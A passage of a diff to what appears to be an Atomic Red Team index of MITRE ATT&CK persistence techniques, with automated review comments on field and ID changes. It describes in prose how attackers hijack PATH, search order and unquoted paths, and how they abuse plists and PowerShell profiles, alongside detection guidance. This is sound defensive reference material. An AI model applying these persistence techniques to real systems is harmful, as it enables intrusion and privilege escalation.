+ Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)
+
+ Consider monitoring Office processes for anomalous DLL loads.
x_mitre_data_sources:
- DLL monitoring
- Loaded DLLs
@@ -12513,17 +12749,9 @@ persistence:
- Process command-line parameters
- File monitoring
- Windows Registry
- x_mitre_detection: |-
- Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy)
-
- Consider monitoring Office processes for anomalous DLL loads.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_system_requirements:
- - Office 2007, 2010, 2013, and 2016
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1137.003:
technique:
@@ -12560,22 +12788,22 @@ persistence:
phase_name: persistence
modified: '2020-03-26T17:35:15.823Z'
created: '2019-11-07T20:06:02.624Z'
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_data_sources:
- - Mail server
- - Process command-line parameters
- - Process monitoring
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_data_sources:
+ - Mail server
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1137.004:
technique:
@@ -12612,22 +12840,22 @@ persistence:
phase_name: persistence
modified: '2020-03-26T17:35:51.656Z'
created: '2019-11-07T20:09:56.536Z'
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_data_sources:
- - Mail server
- - Process monitoring
- - Process command-line parameters
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_data_sources:
+ - Mail server
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1137.005:
technique:
@@ -12664,22 +12892,22 @@ persistence:
phase_name: persistence
modified: '2020-03-26T17:36:15.923Z'
created: '2019-11-07T20:00:25.560Z'
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_data_sources:
- - Mail server
- - Process monitoring
- - Process command-line parameters
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - Administrator
+ - User
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
+ x_mitre_data_sources:
+ - Mail server
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1034:
technique:
@@ -12687,7 +12915,7 @@ persistence:
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Path Interception
description: |-
- **This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**
+ **This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**
Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)
@@ -12757,15 +12985,19 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-30T13:45:24.192Z'
+ modified: '2020-07-06T18:49:35.645Z'
created: '2017-05-31T21:30:36.140Z'
- x_mitre_deprecated: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_contributors:
- - Stefan Kanthak
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
+ - SYSTEM
x_mitre_detection: "Monitor file creation for files named after partial directories
and in locations that may be searched for common processes through the environment
variable, or otherwise should not be user writable. Monitor the executing
@@ -12778,20 +13010,27 @@ persistence:
that could lead to other activities, such as network connections made for
Command and Control, learning details about the environment through Discovery,
and Lateral Movement."
- x_mitre_effective_permissions:
- - User
- - Administrator
- - SYSTEM
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Stefan Kanthak
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_deprecated: true
atomic_tests: []
T1574.007:
technique:
+ id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
+
+ The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
+
+ For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
+ name: Path Interception by PATH Environment Variable
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.007
@@ -12799,17 +13038,6 @@ persistence:
- external_id: CAPEC-capec
source_name: capec
url: https://capec.mitre.org/data/definitions/capec.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Path Interception by PATH Environment Variable
- description: |-
- Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
-
- The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
-
- For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line.
- id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -12818,7 +13046,7 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-26T19:59:42.456Z'
+ modified: '2020-06-20T22:02:40.983Z'
created: '2020-03-13T14:10:43.424Z'
x_mitre_platforms:
- Windows
@@ -12834,10 +13062,33 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_defense_bypassed:
- - Process whitelisting
+ - Application control
atomic_tests: []
T1574.008:
technique:
+ created: '2020-03-13T17:48:58.999Z'
+ modified: '2020-03-26T20:03:27.496Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
+ id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
+
+ Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
+
+ For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
+
+ Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
+ name: Path Interception by Search Order Hijacking
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1574.008
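Review bot: The `x_mitre_defense_bypassed` entry for T1574.007 is changed from `Process whitelisting` to `Application control` (the `+` line in this hunk), and that field behaves as a closed vocabulary, so any downstream filter, report or Sigma/ATT&CK-Navigator mapping keyed on the old literal will silently stop matching this technique. This looks like it follows an upstream ATT&CK wording change, but the file should not end up carrying both terms; before merging, grep the index for `Process whitelisting` and confirm every remaining occurrence was updated in the same regeneration. If the index is produced by a generator, the point is moot for hand-edits but still worth a consumer-side note, e.g. `# x_mitre_defense_bypassed vocabulary changed in ATT&CK v7: "Process whitelisting" -> "Application control"`.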
@@ -12860,29 +13111,6 @@ persistence:
url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
description: Microsoft. (2011, October 24). Environment Property. Retrieved
July 27, 2016.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Path Interception by Search Order Hijacking
- description: |-
- Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
-
- Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
-
- For example, "example.exe" runs "cmd.exe" with the command-line argument net user. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
-
- Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
- id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T20:03:27.496Z'
- created: '2020-03-13T17:48:58.999Z'
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -12907,17 +13135,16 @@ persistence:
atomic_tests: []
T1574.009:
technique:
- id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
- description: |-
- Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
-
- Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
-
- This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
- name: Path Interception by Unquoted Path
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2020-03-13T13:51:58.519Z'
+ modified: '2020-03-26T19:55:39.867Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
external_references:
- source_name: mitre-attack
external_id: T1574.009
@@ -12941,16 +13168,17 @@ persistence:
url: https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
description: absolomb. (2018, January 26). Windows Privilege Escalation Guide.
Retrieved August 10, 2018.
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-26T19:55:39.867Z'
- created: '2020-03-13T13:51:58.519Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Path Interception by Unquoted Path
+ description: |-
+ Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
+
+ Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
+
+ This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
+ id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b
x_mitre_version: '1.0'
x_mitre_is_subtechnique: true
x_mitre_detection: |-
@@ -12996,6 +13224,14 @@ persistence:
elevation_required: true
T1547.011:
technique:
+ created: '2020-01-24T20:02:59.149Z'
+ modified: '2020-06-20T19:57:36.136Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
id: attack-pattern--6747daa2-3533-4e78-8fb8-446ebb86448a
description: "Adversaries may modify plist files to run a program during system
boot or user login. Property list (plist) files contain all of the information
@@ -13052,31 +13288,23 @@ persistence:
description: Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web
traffic. Retrieved July 10, 2017.
source_name: OSX.Dok Malware
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-25T19:47:38.978Z'
- created: '2020-01-24T20:02:59.149Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_detection: |-
- File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.
-
- All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and whitelisted for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)
-
- Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.
+ x_mitre_platforms:
+ - macOS
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
- x_mitre_platforms:
- - macOS
+ x_mitre_detection: |-
+ File system monitoring can determine if plist files are being modified. Users should not have permission to modify these in most cases. Some software tools like "Knock Knock" can detect persistence mechanisms and point to the specific files that are being referenced. This can be helpful to see what is actually being executed.
+
+ All the login items created via shared file lists are viewable by going to the Apple menu -> System Preferences -> Users & Groups -> Login items. This area (and the corresponding file locations) should be monitored and allowed for known good applications. Otherwise, Login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items)
+
+ Monitor process execution for abnormal process execution resulting from modified plist files. Monitor utilities used to modify plist files or that take a plist file as an argument, which may indicate suspicious activity.
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1547.011
atomic_tests:
- name: Plist Modification
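Review bot: The detection text for T1547.011 now reads "This area (and the corresponding file locations) should be monitored and allowed for known good applications", which no longer says what the original guidance meant: maintain an allow-list of known-good Login Items and alert on anything not on it. "Allowed" on its own reads as if the area should simply be permitted, which inverts the advice. A wording that keeps the intent would be `This area (and the corresponding file locations) should be monitored, with known-good applications explicitly allow-listed so that any other entry raises an alert.` Since this block appears to mirror upstream ATT&CK text, the fix likely belongs upstream or in the generator; a local edit would be overwritten on the next regeneration.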
@@ -13098,12 +13326,12 @@ persistence:
2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md)
name: manual
- T1545.001:
+ T1205.001:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1545.001
- url: https://attack.mitre.org/techniques/T1545/001
+ external_id: T1205.001
+ url: https://attack.mitre.org/techniques/T1205/001
- url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
@@ -13118,7 +13346,7 @@ persistence:
This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.
The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.
- id: attack-pattern--90410d1b-b01b-4fe9-9cea-c0a3427a419c
+ id: attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -13127,22 +13355,21 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-01-22T20:26:58.120Z'
- created: '2020-01-22T20:26:58.120Z'
- x_mitre_platforms:
- - Linux
- - macOS
+ modified: '2020-07-01T18:23:25.002Z'
+ created: '2020-07-01T18:23:25.002Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Record network packets sent to and from the system, looking
+ for extraneous packets that do not belong to established flows.
x_mitre_data_sources:
- Netflow/Enclave netflow
- Packet capture
- x_mitre_detection: Record network packets sent to and from the system, looking
- for extraneous packets that do not belong to established flows.
- x_mitre_defense_bypassed:
- - Defensive network service scanning
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1547.010:
technique:
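Review bot: On the new side of this hunk the `x_mitre_defense_bypassed` list (`Defensive network service scanning`) is dropped from the T1205.001 entry while `Windows` is added to `x_mitre_platforms`, and the same technique was re-keyed from `T1545.001` to `T1205.001` with a new STIX id earlier in the diff; consumers of this index that read `x_mitre_defense_bypassed` for this entry must now treat the key as optional rather than assuming it is present. The platform expansion leaves `atomic_tests: []`, so the Windows coverage being claimed has no test behind it; a `# TODO: no atomic test for Windows traffic signaling yet` marker next to `atomic_tests` would make that gap visible in the index rather than implicit. I cannot see from here whether other index artifacts in the repo still reference `T1545.001` or `attack-pattern--90410d1b-…`; if they do, they should be regenerated in this same change so the rename does not leave dangling keys.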
@@ -13187,17 +13414,13 @@ persistence:
phase_name: privilege-escalation
modified: '2020-01-24T19:46:27.750Z'
created: '2020-01-24T19:46:27.750Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Stefan Kanthak
- - Travis Smith, Tripwire
- x_mitre_data_sources:
- - File monitoring
- - API monitoring
- - DLL monitoring
- - Windows Registry
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_effective_permissions:
+ - SYSTEM
+ x_mitre_permissions_required:
+ - SYSTEM
+ - Administrator
x_mitre_detection: "Monitor process API calls to AddMonitor.(Citation:
AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are
abnormal. New DLLs written to the System32 directory that do not correlate
@@ -13205,13 +13428,17 @@ persistence:
writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors.
Run the Autoruns utility, which checks for this Registry key as a persistence
mechanism (Citation: TechNet Autoruns)"
- x_mitre_permissions_required:
- - SYSTEM
- - Administrator
- x_mitre_effective_permissions:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - API monitoring
+ - DLL monitoring
+ - Windows Registry
+ - Process monitoring
+ x_mitre_contributors:
+ - Stefan Kanthak
+ - Travis Smith, Tripwire
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1546.013:
technique:
@@ -13265,15 +13492,11 @@ persistence:
phase_name: persistence
modified: '2020-03-24T21:31:31.082Z'
created: '2020-01-24T15:11:02.758Z'
- x_mitre_platforms:
- - Windows
- x_mitre_contributors:
- - Allen DeRyke, ICE
- x_mitre_data_sources:
- - PowerShell logs
- - File monitoring
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: |-
Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:
@@ -13283,11 +13506,15 @@ persistence:
* $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1
Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - PowerShell logs
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_contributors:
+ - Allen DeRyke, ICE
+ x_mitre_platforms:
+ - Windows
identifier: T1546.013
atomic_tests:
- name: Append malicious start-process cmdlet
@@ -13351,21 +13578,11 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-23T23:50:48.319Z'
+ modified: '2020-05-19T21:22:38.174Z'
created: '2019-11-13T14:44:49.439Z'
- x_mitre_is_subtechnique: false
- x_mitre_detection: |-
- Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
-
- Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)
- x_mitre_version: '1.0'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host intrusion prevention systems
- - File monitoring
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
+ x_mitre_platforms:
+ - Linux
+ - Windows
x_mitre_data_sources:
- VBR
- MBR
@@ -13375,9 +13592,19 @@ persistence:
- EFI
- BIOS
- API monitoring
- x_mitre_platforms:
- - Linux
- - Windows
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host intrusion prevention systems
+ - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching.
+
+ Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014)
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1037.004:
technique:
@@ -13410,18 +13637,18 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-24T23:46:20.433Z'
created: '2020-01-15T16:25:22.260Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - root
- x_mitre_detection: 'The /etc/rc.common file can be monitored to
- detect changes from the company policy. Monitor process execution resulting
- from the rc.common script for unusual or unknown applications or behavior. '
+ x_mitre_platforms:
+ - macOS
x_mitre_data_sources:
- Process monitoring
- File monitoring
- x_mitre_platforms:
- - macOS
+ x_mitre_detection: 'The /etc/rc.common file can be monitored to
+ detect changes from the company policy. Monitor process execution resulting
+ from the rc.common script for unusual or unknown applications or behavior. '
+ x_mitre_permissions_required:
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1037.004
atomic_tests:
- name: rc.common
@@ -13441,18 +13668,15 @@ persistence:
name: bash
T1547.007:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1547.007
- url: https://attack.mitre.org/techniques/T1547/007
- - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- description: Patrick Wardle. (2014, September). Methods of Malware Persistence
- on Mac OS X. Retrieved July 5, 2017.
- source_name: Methods of Mac Malware Persistence
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Re-opened Applications
+ created: '2020-01-24T18:15:06.641Z'
+ modified: '2020-01-24T19:51:37.795Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--e5cc9e7a-e61a-46a1-b869-55fb6eab058e
description: "Adversaries may modify plist files to automatically run an application
